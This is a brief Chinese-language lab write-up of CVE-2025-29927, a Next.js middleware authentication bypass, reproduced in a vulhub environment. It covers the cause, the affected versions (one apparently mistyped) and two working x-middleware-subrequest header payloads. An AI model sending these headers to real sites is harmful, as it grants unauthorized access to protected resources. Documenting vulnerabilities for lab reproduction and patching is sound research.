CVE-2025-29927 Next.js 中间件鉴权绕过漏洞
Next.js
Next.js 是一个基于 React 的现代 Web 开发框架,用来构建高性能、可扩展的 Web 应用和网站。
CVE-2025-29927 Next.js 中间件鉴权绕过漏洞
CVE-2025-29927是Next.js框架中的一个授权绕过漏洞,允许攻击者通过特制的HTTP请求绕过在中间件中执行的授权检查,从而可能访问受保护的资源或执行未经授权的操作。
该漏洞的根源在于Next.js使用了一个内部HTTP头x-middleware-subrequest来防止中间件的递归调用。攻击者可以伪造此头部,导致中间件被跳过,从而绕过关键的安全检查。
影响版本
- Next.js 1.11.4至12.3.4
- Next.js 13.0.0至13.5.8
- Next.js 14.0.0至14.2.24
- Next.js 15.0.0至15.2.2
漏洞复现
参考:https://github.com/vulhub/vulhub/blob/master/next.js/CVE-2025-29927/README.zh-cn.md
环境:vulhub
当直接访问 http://192.168.67.165:3000 或者没有使用正确的登录凭据进行登录时,会重定向到登录界面
要利用此漏洞,你可以在请求中添加 x-middleware-subrequest 请求头,其值为如下所示。Next.js 中间件会错误地处理此请求头并绕过身份验证检查,从而无需输入有效登录凭据而直接进入后台。
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
#或者
x-middleware-subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware